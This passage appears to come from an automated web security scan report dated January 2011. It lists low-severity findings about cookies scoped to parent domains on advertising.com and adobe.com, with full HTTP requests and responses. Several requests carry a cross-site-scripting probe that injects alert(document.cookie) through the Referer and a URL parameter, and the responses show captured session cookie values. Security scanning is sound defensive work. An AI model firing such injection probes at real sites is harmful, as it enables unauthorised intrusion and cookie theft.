
F1=BUBFp0kAAAAAHb4CAEAAgEABAAAABAAAAQAAaEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:09 GMT; path=/
BASE=YnQIx9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WF!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:09 GMT; path=/
ROLL=v5Q2Q0cRVUyqcZa/vGc3WhvkMxIiWOS7HgfCaOA!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:09 GMT; path=/
72318651=_4d291415,1206372681,755399^944664^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=755399/size=300250/u=2/bnum=72318651/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F%253Fdb83d%2527-alert%2528document.cookie%2529-%2527e027fe9bbf5%253D1 HTTP/1.1
Host: r1.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.mlive.com/?db83d'-alert(document.cookie)-'e027fe9bbf5=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|; GUID=MTI5NDUzNzcyMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=UQRKNJpwIg02FAHCdbdBwB7gHw8jGPgsjhADga0KoiTATslBrB; F1=BQBFp0EBAAAABAAAAMAAaEA; BASE=YnQIw9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AiN!; ROLL=v5Q2X0cRVUyqcZa/vGc3WhvkMxIiWOC!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 09 Jan 2011 01:49:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.944664.755399.0XMC
Set-Cookie: F1=BUBFp0kAAAAAHb4CAEAAgEABAAAABAAAAQAAaEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:09 GMT; path=/
Set-Cookie: BASE=YnQIx9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WF!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:09 GMT; path=/
Set-Cookie: ROLL=v5Q2Q0cRVUyqcZa/vGc3WhvkMxIiWOS7HgfCaOA!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:09 GMT; path=/
Set-Cookie: 72318651=_4d291415,1206372681,755399^944664^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 09 Jan 2011 01:49:09 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1047

document.write('<iframe src="http://view.atdmt.com/AVE/iview/285783663/direct;wi.300;hi.250/01/1206372681?click=http://r1.ace.advertising.com/click/site=0000755399/mnum=0000944664/cstr=72318651=_4d291
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1.ace.advertising.com
Path:	/site=758630/size=160600/u=2/bnum=52607936/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.pogo.com%252Fgames%252Fscrabble%253FpageSection%253Dfree_home_hot_games1_pl_scrabble

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=Q+QKNJpwIg02FwBCdbdBcA7gHw8jGSgsjhADgaAL; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/
F1=BA5Dp0EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/
BASE=YnQIy9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWK!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/
ROLL=v5Q2V0cRVUyqcZK!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/
52607936=_4d290f90,0846642328,758630^906164^1^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=758630/size=160600/u=2/bnum=52607936/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.pogo.com%252Fgames%252Fscrabble%253FpageSection%253Dfree_home_hot_games1_pl_scrabble HTTP/1.1
Host: r1.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|; F1=B4hZi0EBAAAABAAAAcAAgEA; BASE=YnQI99MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YM!; ROLL=v5Q2T0cD6byq6qaxJoe34Sv8XRJi49SB7jfC09AP2YSOminn1Wmq7LDEe81vdCC!; C2=y/8JNJpwIg02FAGCdbdBgB7gHw8jGiksjhADgaAc; GUID=MTI5NDQ1NDc3MDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 09 Jan 2011 01:29:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.906164.758630.0XMC
Set-Cookie: C2=Q+QKNJpwIg02FwBCdbdBcA7gHw8jGSgsjhADgaAL; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/
Set-Cookie: F1=BA5Dp0EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/
Set-Cookie: BASE=YnQIy9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWK!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/
Set-Cookie: ROLL=v5Q2V0cRVUyqcZK!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/
Set-Cookie: 52607936=_4d290f90,0846642328,758630^906164^1^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 09 Jan 2011 01:29:52 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 595

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6457.4298.ADVERTISING.COM/B4840137.13;sz=160x600;click=http://r1.ace.advertising.com/click/site=0000758630/mnum=0
...[SNIP]...

9.38. http://r1.ace.advertising.com/site=777340/size=300600/u=2/bnum=17871065/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1.ace.advertising.com
Path:	/site=777340/size=300600/u=2/bnum=17871065/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=wPRKNJpwIg02FtBCdbdRbA7gHw8jGPgsjhADga0K; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/
F1=BA/Ep0EBAAAABAAAAIAAaEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/
BASE=YnQIz9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqA!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/
ROLL=v5Q2W0cRVUyqcZa/vGc3WhP!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/
17871065=_4d2913f0,4120808867,777340^955433^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=777340/size=300600/u=2/bnum=17871065/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F HTTP/1.1
Host: r1.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.mlive.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|; GUID=MTI5NDQ1NDc3MDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=Q+QKNJpwIg02FwBCdbdBcA7gHw8jGSgsjhADgaAL; F1=BA5Dp0EBAAAABAAAAEAAgEA; BASE=YnQIy9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWK!; ROLL=v5Q2V0cRVUyqcZK!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 09 Jan 2011 01:48:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.955433.777340.0XMC
Set-Cookie: C2=wPRKNJpwIg02FtBCdbdRbA7gHw8jGPgsjhADga0K; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/
Set-Cookie: F1=BA/Ep0EBAAAABAAAAIAAaEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/
Set-Cookie: BASE=YnQIz9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqA!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/
Set-Cookie: ROLL=v5Q2W0cRVUyqcZa/vGc3WhP!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/
Set-Cookie: 17871065=_4d2913f0,4120808867,777340^955433^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 09 Jan 2011 01:48:32 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1579

document.write('<HTML>');document.write('<HEAD>');document.write('<TITLE> </TITLE>');document.write('</HEAD>');document.write('<BODY>');document.write('<OBJECT classid=\'clsid:D27CDB6E-AE6D-11cf-
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1.ace.advertising.com
Path:	/site=777340/size=300600/u=2/bnum=49979532/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F%253Fdb83d%2527-alert%2528document.cookie%2529-%2527e027fe9bbf5%253D1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=UQRKNJpwIg02FAHCdbdBwB7gHw8jGPgsjhADga0KoiTATslBrB; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/
F1=BQBFp0EBAAAABAAAAMAAaEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/
BASE=YnQIw9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AiN!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/
ROLL=v5Q2X0cRVUyqcZa/vGc3WhvkMxIiWOC!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/
49979532=_4d291414,0737842127,777340^949895^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=777340/size=300600/u=2/bnum=49979532/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F%253Fdb83d%2527-alert%2528document.cookie%2529-%2527e027fe9bbf5%253D1 HTTP/1.1
Host: r1.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.mlive.com/?db83d'-alert(document.cookie)-'e027fe9bbf5=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|; F1=BA/Ep0EBAAAABAAAAIAAaEA; BASE=YnQIz9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqA!; ROLL=v5Q2W0cRVUyqcZa/vGc3WhP!; C2=4PRKNJpwIg02FAHCdbdBwB7gHw8jGPgsjhADga0K; GUID=MTI5NDUzNzcyMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 09 Jan 2011 01:49:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.949895.777340.0XMC
Set-Cookie: C2=UQRKNJpwIg02FAHCdbdBwB7gHw8jGPgsjhADga0KoiTATslBrB; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/
Set-Cookie: F1=BQBFp0EBAAAABAAAAMAAaEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/
Set-Cookie: BASE=YnQIw9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AiN!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/
Set-Cookie: ROLL=v5Q2X0cRVUyqcZa/vGc3WhvkMxIiWOC!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/
Set-Cookie: 49979532=_4d291414,0737842127,777340^949895^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 09 Jan 2011 01:49:08 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1047

document.write('<iframe src="http://view.atdmt.com/CNT/iview/286710319/direct;wi.300;hi.600/01/0737842127?click=http://r1.ace.advertising.com/click/site=0000777340/mnum=0000949895/cstr=49979532=_4d291
...[SNIP]...

9.40. http://www.adobe.com/cfusion/exchange/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adobe.com
Path:	/cfusion/exchange/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=1C5C2077%2D9490%2D3BC1%2D91B37A414A682C30;domain=.adobe.com;expires=Tue, 01-Jan-2041 05:25:22 GMT;path=/cfusion/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cfusion/exchange/ HTTP/1.1
Host: www.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:25:22 GMT
Server: JRun Web Server
Set-Cookie: CFID=7126392;expires=Tue, 01-Jan-2041 05:25:22 GMT;path=/
Set-Cookie: CFTOKEN=132e3b7190093aee-1C5C204D-EC18-7019-3906CCE757EA8849;expires=Tue, 01-Jan-2041 05:25:22 GMT;path=/
Set-Cookie: DYLANSESSIONID=48306eaaf197ace953b04592529724475551;path=/
Set-Cookie: UID=1C5C2077%2D9490%2D3BC1%2D91B37A414A682C30;domain=.adobe.com;expires=Tue, 01-Jan-2041 05:25:22 GMT;path=/cfusion/
Set-Cookie: CFAUTHORIZATION_adobe_com=;expires=Sat, 09-Jan-2010 05:25:22 GMT;path=/cfusion
Environment: webapp-da1-02.corp.adobe.com:8800
Content-Language: en-US
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
X-Adobe-Zip: true
Set-Cookie: DylanApp-BigIP=223114250.24610.0000; path=/
Connection: close
Vary: Accept-Encoding, User-Agent

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xh
...[SNIP]...

9.41. http://www.adobe.com/cfusion/marketplace/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adobe.com
Path:	/cfusion/marketplace/index.cfm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=1C5DBCC0%2DAF9A%2D535E%2D2CEE49CDABEF82D1;domain=.adobe.com;expires=Tue, 01-Jan-2041 05:25:32 GMT;path=/cfusion/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cfusion/marketplace/index.cfm HTTP/1.1
Host: www.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:25:32 GMT
Server: JRun Web Server
Set-Cookie: CFID=6727968;expires=Tue, 01-Jan-2041 05:25:32 GMT;path=/
Set-Cookie: CFTOKEN=b3b6fb7bf15b5dba-1C5DBC63-0270-1BAD-1AB71BB1FC329068;expires=Tue, 01-Jan-2041 05:25:32 GMT;path=/
Set-Cookie: DYLANSESSIONID=4830cfe6058d4297cda07d4b657e334c4d4b;path=/
Set-Cookie: UID=1C5DBCC0%2DAF9A%2D535E%2D2CEE49CDABEF82D1;domain=.adobe.com;expires=Tue, 01-Jan-2041 05:25:32 GMT;path=/cfusion/
Set-Cookie: CFAUTHORIZATION_adobe_com=;expires=Sat, 09-Jan-2010 05:25:32 GMT;path=/cfusion
Content-Type: text/html; charset=UTF-8
X-Adobe-Zip: true
Environment: webapp-da1-11.corp.adobe.com:8800
Content-Language: en-US
Content-Language: en-US
Set-Cookie: DylanApp-BigIP=877425674.24610.0000; path=/
Connection: close
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="EN_US">
<he
...[SNIP]...

9.42. http://www.adobe.com/cfusion/membership/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adobe.com
Path:	/cfusion/membership/index.cfm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=1C5A140F%2DD895%2D113E%2D36E6ED950382D262;domain=.adobe.com;expires=Tue, 01-Jan-2041 05:25:08 GMT;path=/cfusion/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cfusion/membership/index.cfm HTTP/1.1
Host: www.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 09 Jan 2011 05:25:08 GMT
Server: JRun Web Server
Set-Cookie: CFID=6659512;expires=Tue, 01-Jan-2041 05:25:08 GMT;path=/
Set-Cookie: CFTOKEN=f4347a9052ead450-1C5A13B4-FB54-F217-4F00E67240D7B5AD;expires=Tue, 01-Jan-2041 05:25:08 GMT;path=/
Set-Cookie: DYLANSESSIONID=483093c2ba6274c2472f7e5384a3d1d576f6;path=/
Set-Cookie: UID=1C5A140F%2DD895%2D113E%2D36E6ED950382D262;domain=.adobe.com;expires=Tue, 01-Jan-2041 05:25:08 GMT;path=/cfusion/
Set-Cookie: CFAUTHORIZATION_adobe_com=;expires=Sat, 09-Jan-2010 05:25:08 GMT;path=/cfusion
Content-Type: text/html; charset=UTF-8
X-Adobe-Zip: false
Environment: webapp-da1-11.corp.adobe.com:8500
Content-Language: en-US
Content-Language: en-US
location: https://www.adobe.com/cfusion/membership/index.cfm?nl=1&nf=1
Set-Cookie: DylanApp-BigIP=877425674.13345.0000; path=/
Content-Length: 0
Connection: close

9.43. http://www.adobe.com/cfusion/membership/logout.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adobe.com
Path:	/cfusion/membership/logout.cfm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=1C5A9C8D%2DB2A1%2D7B91%2D5082B849805CBB1C;domain=.adobe.com;expires=Tue, 01-Jan-2041 05:25:12 GMT;path=/cfusion/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cfusion/membership/logout.cfm HTTP/1.1
Host: www.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 09 Jan 2011 05:25:12 GMT
Server: JRun Web Server
Set-Cookie: CFID=7115771;expires=Tue, 01-Jan-2041 05:25:12 GMT;path=/
Set-Cookie: CFTOKEN=802706847268b08f-1C5A9C66-D18B-0210-A596AFF349468AB8;expires=Tue, 01-Jan-2041 05:25:12 GMT;path=/
Set-Cookie: DYLANSESSIONID=48301f6e250b10ed162b5e67133466408062;path=/
Set-Cookie: UID=1C5A9C8D%2DB2A1%2D7B91%2D5082B849805CBB1C;domain=.adobe.com;expires=Tue, 01-Jan-2041 05:25:12 GMT;path=/cfusion/
Set-Cookie: CFAUTHORIZATION_adobe_com=;expires=Sat, 09-Jan-2010 05:25:12 GMT;path=/cfusion
Set-Cookie: CFAUTHORIZATION_adobe_com=;expires=Sat, 09-Jan-2010 05:25:12 GMT;path=/cfusion
Set-Cookie: RMID=;domain=.adobe.com;expires=Sat, 09-Jan-2010 05:25:12 GMT;path=/
Set-Cookie: SCREENNAME=;domain=.adobe.com;expires=Sat, 09-Jan-2010 05:25:12 GMT;path=/
Set-Cookie: AUID=;domain=.adobe.com;expires=Sat, 09-Jan-2010 05:25:12 GMT;path=/
Set-Cookie: MM_ESD=;domain=.adobe.com;expires=Sat, 09-Jan-2010 05:25:12 GMT;path=/
Set-Cookie: MM_TRIALS=;domain=.adobe.com;expires=Sat, 09-Jan-2010 05:25:12 GMT;path=/
Set-Cookie: ADC_MEMBER=;domain=.adobe.com;expires=Sat, 09-Jan-2010 05:25:12 GMT;path=/
Content-Type: text/html; charset=UTF-8
X-Adobe-Zip: false
Environment: webapp-da1-04.corp.adobe.com:8800
Content-Language: en-US
Content-Language: en-US
location: /
Set-Cookie: DylanApp-BigIP=1179415562.24610.0000; path=/
Connection: close
Vary: Accept-Encoding, User-Agent

<html>
<head>
<title>Macromedia logout</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>

<body>

9.44. http://www.adobe.com/cfusion/partnerportal/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adobe.com
Path:	/cfusion/partnerportal/index.cfm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=1C5BD2B1%2DB643%2D8F26%2D79D72DC963592023;domain=.adobe.com;expires=Tue, 01-Jan-2041 05:25:20 GMT;path=/cfusion/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cfusion/partnerportal/index.cfm HTTP/1.1
Host: www.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 09 Jan 2011 05:25:20 GMT
Server: JRun Web Server
Set-Cookie: CFID=7115774;expires=Tue, 01-Jan-2041 05:25:20 GMT;path=/
Set-Cookie: CFTOKEN=bf6594358230f035-1C5BD289-F861-53E7-EF47F0828906ED0C;expires=Tue, 01-Jan-2041 05:25:20 GMT;path=/
Set-Cookie: DYLANSESSIONID=4830d5f3e3edde0152215310b371d617445b;path=/
Set-Cookie: UID=1C5BD2B1%2DB643%2D8F26%2D79D72DC963592023;domain=.adobe.com;expires=Tue, 01-Jan-2041 05:25:20 GMT;path=/cfusion/
Set-Cookie: CFAUTHORIZATION_adobe_com=;expires=Sat, 09-Jan-2010 05:25:20 GMT;path=/cfusion
Content-Type: text/html; charset=UTF-8
X-Adobe-Zip: true
Environment: webapp-da1-04.corp.adobe.com:8800
Content-Language: en-US
Content-Language: en-US
location: https://www.adobe.com/cfusion/partnerportal/index.cfm
Set-Cookie: DylanApp-BigIP=1179415562.24610.0000; path=/
Content-Length: 0
Connection: close

9.45. http://www.adobe.com/cfusion/showcase/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adobe.com
Path:	/cfusion/showcase/index.cfm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=1C5FE0E3%2DBCB0%2DEEB3%2D46E28AA62C358F29;domain=.adobe.com;expires=Tue, 01-Jan-2041 05:25:31 GMT;path=/cfusion/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cfusion/showcase/index.cfm HTTP/1.1
Host: www.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:25:27 GMT
Server: JRun Web Server
Set-Cookie: CFID=7076697;expires=Tue, 01-Jan-2041 05:25:31 GMT;path=/
Set-Cookie: CFTOKEN=45e90dab0cf2e0f4-1C5FE030-9D22-1E3F-163C220229B483EB;expires=Tue, 01-Jan-2041 05:25:31 GMT;path=/
Set-Cookie: DYLANSESSIONID=4830fe667c0d6bf4ef251b79727419e6f6a3;path=/
Set-Cookie: UID=1C5FE0E3%2DBCB0%2DEEB3%2D46E28AA62C358F29;domain=.adobe.com;expires=Tue, 01-Jan-2041 05:25:31 GMT;path=/cfusion/
Set-Cookie: CFAUTHORIZATION_adobe_com=;expires=Sat, 09-Jan-2010 05:25:31 GMT;path=/cfusion
Environment: webapp-da1-09.corp.adobe.com:8600
Content-Language: en-US
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
X-Adobe-Zip: true
Set-Cookie: DylanApp-BigIP=1095529482.38945.0000; path=/
Connection: close
Vary: Accept-Encoding, User-Agent

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
